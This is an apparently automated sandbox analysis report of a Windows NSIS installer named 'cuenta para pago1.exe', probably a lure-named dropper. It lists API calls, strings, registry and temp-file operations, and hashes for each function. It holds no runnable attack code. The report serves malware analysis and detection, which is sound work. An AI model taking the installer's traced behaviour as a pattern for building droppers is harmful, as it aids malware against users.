                                                                                        • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                                        • Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00403160), ref: 004051D4
                                                                                        • Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll), ref: 004051E6
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsqE113.tmp$C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Spidsgattedes\Pushwainling\$Call
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph: function at 00405179 (blocks marked Executed / Not Executed)
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                                      • lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                                      • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00403160), ref: 004051D4
                                                                                      • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll), ref: 004051E6
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph: function at 004025E5 (blocks marked Executed / Not Executed)
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402688
                                                                                      • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004026AB
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004026C1
                                                                                        • Part of subcall function 00405CD0: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405CE6
                                                                                      • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040276D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                      • String ID: 9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph: function at 00406384 (blocks marked Executed / Not Executed)
                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
                                                                                      • wsprintfW.USER32 ref: 004063D6
                                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004063EA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph: function at 00403027 (blocks marked Executed / Not Executed)
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CountTick$wsprintf
                                                                                      • String ID: ... %d%%
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 756 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 763 4023c7-4023cf 756->763 764 402a4c-402a5b 756->764 765 4023d1-4023de call 402bbf lstrlenW 763->765 766 4023e2-4023e5 763->766 765->766 769 4023f5-4023f8 766->769 770 4023e7-4023f4 call 402ba2 766->770 774 402409-40241d RegSetValueExW 769->774 775 4023fa-402404 call 403027 769->775 770->769 778 402422-4024fc RegCloseKey 774->778 779 40241f 774->779 775->774 778->764 781 40281e-402825 778->781 779->778 781->764
                                                                                      APIs
                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqE113.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsqE113.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsqE113.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CloseCreateValuelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsqE113.tmp
                                                                                      • API String ID: 1356686001-882796675
                                                                                      • Opcode ID: 90e2c532cef6f7d866fc85d66413cbe16e3cd5261a2574de0a4410d976b13d76
                                                                                      • Instruction ID: 604b722b9c55a9196ccdb8bc5d46c0fd7c9d49ef9fceb37282f2360b7a100841
                                                                                      • Opcode Fuzzy Hash: 90e2c532cef6f7d866fc85d66413cbe16e3cd5261a2574de0a4410d976b13d76
                                                                                      • Instruction Fuzzy Hash: 1B11AE71E00108BFEB10AFA4DE89EAE767CEB54358F10403AF904B61D1D6B85E419628
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 782 405c1e-405c2a 783 405c2b-405c5f GetTickCount GetTempFileNameW 782->783 784 405c61-405c63 783->784 785 405c6e-405c70 783->785 784->783 786 405c65 784->786 787 405c68-405c6b 785->787 786->787
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00405C3C
                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403268,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00405C57
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C23
                                                                                      • nsa, xrefs: 00405C2B
                                                                                      • "C:\Users\user\Desktop\cuenta para pago1.exe", xrefs: 00405C1E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CountFileNameTempTick
                                                                                      • String ID: "C:\Users\user\Desktop\cuenta para pago1.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                      • API String ID: 1716503409-2241679662
                                                                                      • Opcode ID: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                                                                      • Instruction ID: a4e54dcc62cd1b6bfc855809a1f33464b5edbff741e4ba4f72954512b04b2574
                                                                                      • Opcode Fuzzy Hash: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                                                                      • Instruction Fuzzy Hash: 58F09076B04204BBEB009F5ADD49ADFB7ACEB91710F10403AF900E7190E2B0AE44CB64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                      • String ID:
                                                                                      • API String ID: 1912718029-0
                                                                                      • Opcode ID: fdbde4e884f383338cc21de88dd7407a01aefe671536b7f53bbd552f7ed090ed
                                                                                      • Instruction ID: 13aa261ecf2a86817b53105e55b29f339a5543dfd3ea7b5a0579e289bf8829aa
                                                                                      • Opcode Fuzzy Hash: fdbde4e884f383338cc21de88dd7407a01aefe671536b7f53bbd552f7ed090ed
                                                                                      • Instruction Fuzzy Hash: 04116A71908118FFEF119F90DE8CEAE3B79FB14384F100476FA05A11A0D3B49E52AA69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                      • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                        • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                        • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                        • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4068876231.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                      • String ID:
                                                                                      • API String ID: 1791698881-3916222277
                                                                                      • Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                                                      • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                      • Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                                                      • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Timeout
                                                                                      • String ID: !
                                                                                      • API String ID: 1777923405-2657877971
                                                                                      • Opcode ID: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                                                                      • Instruction ID: a86adb03786c756a90e8c754dee758adf3648459c58847ecf436330ca9d5af9c
                                                                                      • Opcode Fuzzy Hash: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                                                                      • Instruction Fuzzy Hash: B121B071944209BEEF01AFB0CE4AABE7B75EB40304F10403EF601B61D1D6B89A40DB69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F11
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F32
                                                                                      • RegCloseKey.ADVAPI32(?,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F55
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID: Call
                                                                                      • API String ID: 3677997916-1824292864
                                                                                      • Opcode ID: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
                                                                                      • Instruction ID: 1229758a71a34d9b3841ebc19c7c3eba7c9bd897b4c963cc492d8629085b1b1e
                                                                                      • Opcode Fuzzy Hash: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
                                                                                      • Instruction Fuzzy Hash: B9011E3255020AEADF21CF55ED09EDB3BA9EF55350F004036F905D6160D335D964DFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                                        • Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00403160), ref: 004051D4
                                                                                        • Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll), ref: 004051E6
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                                        • Part of subcall function 004056FA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                                                                        • Part of subcall function 004056FA: CloseHandle.KERNEL32(?), ref: 00405730
                                                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 3585118688-0
                                                                                      • Opcode ID: 7b08a6d90b05bbed925343c6248fd7a4a37af617971c498a8cfedcd14d37eb6c
                                                                                      • Instruction ID: 19c395d66568059f601410a6cc42e832bf6643a8327f7d33ffb52a85e02cf26d
                                                                                      • Opcode Fuzzy Hash: 7b08a6d90b05bbed925343c6248fd7a4a37af617971c498a8cfedcd14d37eb6c
                                                                                      • Instruction Fuzzy Hash: FF11A131900108EBCF21AFA1CC849DE7A76EB44314F204037F605B61E1C7798E81DB9E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(?,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,00405AED,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, 4Ww,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,77573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405A8C
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405AA4
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                        • Part of subcall function 00405648: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040568B
                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Spidsgattedes\Pushwainling\,?,00000000,000000F0), ref: 00401645
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Spidsgattedes\Pushwainling\, xrefs: 00401638
                                                                                      Similarity
                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Spidsgattedes\Pushwainling\
                                                                                      • API String ID: 1892508949-3308347815
                                                                                      • Opcode ID: 50f3ce724175e93cf5c6c72f007c2b38a77747b88a25ec32c8f5577a88bf2d41
                                                                                      • Instruction ID: c4264af60da0efacfc01d1487171d30b62475a562f2de0234080d29f7ac7759b
                                                                                      • Opcode Fuzzy Hash: 50f3ce724175e93cf5c6c72f007c2b38a77747b88a25ec32c8f5577a88bf2d41
                                                                                      • Instruction Fuzzy Hash: 5611B631504504EBCF206FA5CD4199F3AB1EF54368B240A3BF946B61F1D63E4A81DE5E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                                                                      • CloseHandle.KERNEL32(?), ref: 00405730
                                                                                      Strings
                                                                                      • Error launching installer, xrefs: 0040570D
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcess
                                                                                      • String ID: Error launching installer
                                                                                      • API String ID: 3712363035-66219284
                                                                                      • Opcode ID: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                                                                      • Instruction ID: 962493b9a5858e12d65c81fa64705238b81a3a8385349ca8c6d0e9dfe3a178e2
                                                                                      • Opcode Fuzzy Hash: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                                                                      • Instruction Fuzzy Hash: 55E0BFB4A00209BFEB109F64ED05F7B76BCE714604F804521BE15F6190D7B4A8118A79
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                                                                      • Instruction ID: 4318c0865f168c3c39c32caca64743d138ecf2e5224254a141b4117f5842e3e1
                                                                                      • Opcode Fuzzy Hash: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                                                                      • Instruction Fuzzy Hash: 6FA14371E00229CBDF28CFA8C854BADBBB1FF44305F15856AD816BB281C7785A96DF44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                                                                      • Instruction ID: 8bd9da501ed45a7f5d2d0dfc2be718583217048081f6288eced8fd4e99326474
                                                                                      • Opcode Fuzzy Hash: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                                                                      • Instruction Fuzzy Hash: D3913370D00229CBDF28CFA8C854BADBBB1FF44305F15812AD816BB291C7795A96CF84
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                                                                      • Instruction ID: cc0f6ab454a14bc981dfc54755cdbe6dc6b21fe19783e5e5045ac21e9f873034
                                                                                      • Opcode Fuzzy Hash: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                                                                      • Instruction Fuzzy Hash: 57813271E00229CBDB24CFA8C844BADBBB1FF45305F25816AD816BB291C7789A95CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
